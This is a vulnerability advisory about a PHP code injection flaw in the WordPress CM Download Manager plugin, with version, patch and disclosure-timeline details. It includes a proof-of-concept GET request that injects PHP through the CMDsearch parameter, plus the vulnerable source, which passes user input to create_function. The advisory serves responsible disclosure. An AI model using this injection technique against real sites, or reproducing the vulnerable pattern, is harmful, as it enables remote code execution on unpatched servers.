ITAS Team discovered a Code Injection vulnerability in CM Download Manager Plugin

ITAS Team discovered a Code Injection vulnerability in CM Download Manager Plugin

ITAS Team discovered a Code Injection vulnerability in CM Download Manager plugin (https://wordpress.org/plugins/cm-download-manager/). This code injection vulnerability was found and confirmed by vendor. A successful attack could allow an anonymous attacker to run OS command, execute PHP code and gain full control of the application. This vulnerability exists in free edition and pro edition. There are about 36,000 downloads. If individuals and organizations have been using this plugin for your website, you should update the latest version (2.0.4).

Vulnerability information:
– Vulnerability : Code injection
– Vendor : CreativeMinds (https://www.cminds.com/) – CM Download Manager Plugin
– Link download : https://wordpress.org/plugins/cm-download-manager/
– Affected version: Version 2.0.0 and maybe previous version
– Fix version: version 2.0.4
– Discovered by: Le Ngoc Phi – phi.n.le@itas.vn and ITAS Team

::VULNERABILITY DETAIL::
GET /cmdownloads/?CMDsearch=”.phpinfo().” HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879
Connection: keep-alive

Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadC
ontroller.php
Vulnerable code: (Line: 130 -> 158)

public static function alterSearchQuery($search, $query)
{
if( ( (isset($query->query_vars[‘post_type’]) && $query->query_vars[‘post_type’] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars[‘widget’]) || $query->query_vars[‘widget’] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET[‘CMDsearch’]) )
{
global $wpdb;
$search_term = $_GET[‘CMDsearch’];
if( !empty($search_term) )
{
$search = ”;
$query->is_search = true;
// added slashes screw with quote grouping when done early, so done later
$search_term = stripslashes($search_term);
preg_match_all(‘/”.*?(“|$)|((?<=[rnt “,+])|^)[^rnt “,+]+/’, $search_term, $matches); $terms = array_map(‘_search_terms_tidy’, $matches[0]); $n = ‘%’; $searchand = ‘ AND ‘; foreach((array) $terms as $term) { $term = esc_sql(like_escape($term)); $search .= “{$searchand}(($wpdb->posts.post_title LIKE ‘{$n}{$term}{$n}’) OR ($wpdb->posts.post_content LIKE ‘{$n}{$term}{$n}’))”;
}
add_filter(‘get_search_query’, create_function(‘$q’, ‘return “‘ . $search_term . ‘”;’), 99, 1);
remove_filter(‘posts_request’, ‘relevanssi_prevent_default_request’);
remove_filter(‘the_posts’, ‘relevanssi_query’);
}
}
return $search;
}

Information disclosure:
– 11/08/2014: Detected vulnerability
– 11/10/2014: Inform the vendor
– 11/10/2014: Vendor confirmed
– 11/10/2014: Vendor releases patch
– 11/14/2014: ITAS Team publishes information

Reference:
– https://downloadsmanager.cminds.com/release-notes/
– https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8877
– http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9215
– http://www.securityfocus.com/archive/1/534037
– http://www.exploit-db.com/exploits/35324/

Demonstration video